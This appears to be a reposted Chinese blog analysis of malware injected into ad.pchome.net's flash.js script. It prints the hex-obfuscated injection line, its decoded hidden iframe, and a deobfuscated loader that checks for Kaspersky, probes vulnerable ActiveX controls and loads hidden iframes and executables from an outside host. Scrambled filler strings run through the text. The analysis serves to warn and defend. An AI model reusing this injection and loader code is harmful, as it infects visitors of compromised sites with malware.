上周方法病毒来源竟然为ad.pchome.net原来被挂马
上周方法病毒来源竟然为ad.pchome.net原来被挂马
发布时间:2016-12-26 来源:查字典编辑
摘要:挂得比较隐蔽,http://btn.pchome.net/flash.js的中间被加入了如下代码:window["x64x6fx63x75x...

挂得比较隐蔽,http://btn.pchome.net/flash.js的中间被加入了如下代码:

window["x64x6fx63x75x6dx65x6ex74"]["x77x72x69x74x65x6cx6e"]('x3cx69x66x72x61x6dx65x68x65x69x67x68x74x3dx30x77x69x64x74x68x3dx30x73x72x63x3dx22x68x74x74x70x3ax2fx2fx77x77x77x2ex35x39x2ex76x63x2fx70x61x67x65x2fx61x64x64x5fx36x34x34x34x35x35x2ex68x74x6dx22x3ex3cx2fx69x66x72x61x6dx65x3e');

也就是这个了:

window["document"]["writeln"]('<iframeheight=0width=0src="http://www.59.vc/page/add_644455.htm"></iframe>');

但只有这个js还不会使得那个iframe生效,使得他生效的是调用这个js显示flash的代码:

<scriptlanguage="javascript"type="text/javascript">

writeflashhtml("_swf=http://btn.pchome.net/pchome/20071217/300_250.swf","_width=300","_height=250","_wmode=opaque");

</script>

有了这个,iframe就生效了;经过一番调用和解密后得:

functionbIsKIS(){for(i=2;i<26;i++){varkis6=newImage();varkis7=newImage();varroot=String.fromCharCode(65+i);kis6.src="mk:@MSITStore:"+root+":ProgramFilesKasperskyLabKasperskyInternetSecurity6.0Doccontext.chm::/images/help.gif";kis7.src="mk:@MSITStore:"+root+":ProgramFilesKasperskyLabKasperskyInternetSecurity7.0Doccontext.chm::/images/help.gif";if(kis6.height==41||kis7.height==41)returntrue}returnfalse}varThen=newDate();aaxxx="xxxyyyyfassssfsadfasdf";Then.setTime(Then.getTime()+24*60*60*1000);varaaffdasfascookie=newString(document.cookie);varcookieHeader="Cookie1=";aaxxx="xxxyyyyfassssfsadfasdf";if(!bIsKIS()&&aaffdasfascookie.indexOf(cookieHeader)==-1){aaxxx="xxxyyyyfassssfsadfasdf";document.cookie="Cookie1=POPWINDOS;expires="+Then.toGMTString();aaxxx="xxxyyyyfassssfsadfasdf";try{if(newActiveXObject("IERPCtl.IERPCtl.1"))document.write('<iframestyle=display:nonesrc="http://w18.vg/real.gif"></iframe>')}catch(e){}try{if(navigator.userAgent.toLowerCase().indexOf("msie7")==-1)document.write('<iframestyle=display:nonesrc="http://w18.vg/ms.gif"></iframe>')}catch(e){}try{if(newActiveXObject("DPClient.Vod"))document.write('<iframestyle=display:nonesrc="http://w18.vg/xl.gif"></iframe>')}catch(e){}try{if(newActiveXObject("GLCHAT.GLChatCtrl.1"))document.write('<iframestyle=display:nonesrc="http://w18.vg/lz.gif"></iframe>')}catch(e){}try{if(newActiveXObject("MPS.StormPlayer.1"))document.write('<iframestyle=display:nonesrc="http://w18.vg/bf.gif"></iframe>')}catch(e){}try{if(newActiveXObject("BaiduBar.Tool.1"))document.write('<iframestyle=display:nonesrc="http://w18.vg/baidu.gif"></iframe>')}catch(e){}}

K##E+XD++IK+EX=#D$IKEXD+$I#KEXDI+K$EX$DI$$KE##X#DI=K+E$X=$DI#K+#EX=DIK=E$=XDIK=$EX=DIK$E$#X=D=I##KE#=X+$D+

挑了几个解密得:http://w18.vg/s.exe

从这个文件里面得到另外一个链接:http://w18.vg/ss.exe

有点面熟的东西……

##K=E#X+D=IKE$XD$=I==K+#EXD=#I=KE$+XDI#K$=EX=D=#IK+E=X$D==I=#K=E##X$D$+IK=#EXD+IK$EX$=D+I+K#E$XD+IKEX#D

从上面可以知道,出问题的是那个flash.js,因此所有使用这个js来放flash的页面全都有毒了!我随便找了几个页面,发现都是有毒的,这回可是大面积的被挂咯,同志们自己小心了。

K$EX=+DI#$KE+X#DIK$EXD$I=KE$XD+#I+KEXD=I+KE=X$D=I=KEXD#=IK==E$X=D=I#+KEXD=IK#EX#DI=K=E=X=#DIKEXDI#KE

转载请保留声明!(http://hi.baidu.com/dikex/blog/item/36300afa339a8c889e5146f5.html)

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新病毒查杀学习
热门病毒查杀学习
实用技巧子分类